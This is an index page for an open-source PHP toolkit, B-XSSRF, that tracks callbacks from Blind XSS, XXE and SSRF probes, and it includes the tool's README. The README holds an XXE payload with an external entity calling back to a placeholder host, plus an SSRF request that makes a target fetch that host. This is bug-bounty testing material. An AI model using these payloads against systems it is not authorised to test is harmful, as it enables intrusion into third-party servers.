Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/SpiderMate/B-XSSRF
Toolkit to detect and keep track on Blind XSS, XXE & SSRF
https://github.com/SpiderMate/B-XSSRF
Last synced: about 1 month ago
JSON representation
Toolkit to detect and keep track on Blind XSS, XXE & SSRF
- Host: GitHub
- URL: https://github.com/SpiderMate/B-XSSRF
- Owner: SpiderMate
- Created: 2019-08-23T05:23:42.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2019-08-23T10:50:05.000Z (over 5 years ago)
- Last Synced: 2024-08-01T10:17:01.585Z (4 months ago)
- Language: PHP
- Homepage:
- Size: 194 KB
- Stars: 295
- Watchers: 6
- Forks: 74
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - SpiderMate/B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF (PHP)
- awesome-bugbounty-tools - B-XSSRF - Toolkit to detect and keep track on Blind XSS, XXE & SSRF (Exploitation / XXE Injection)
README
B-XSSRF
Toolkit to detect and keep track on Blind XSS, XXE & SSRF
### SETUP
- Upload the files to your server.
- Create a Database and upload database.sql file to it.
- Change the DB Credentials in db.php file.
- Ready.
### USAGE
BLIND XSS
```
```
BLIND XXE
```
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
```
SSRF
```
GET /testssrf.php=http://mysite.com/bxssrf/request.php
```
### DEFAULT CREDENTIALS
```
USER : [email protected]
PASS : 123456
```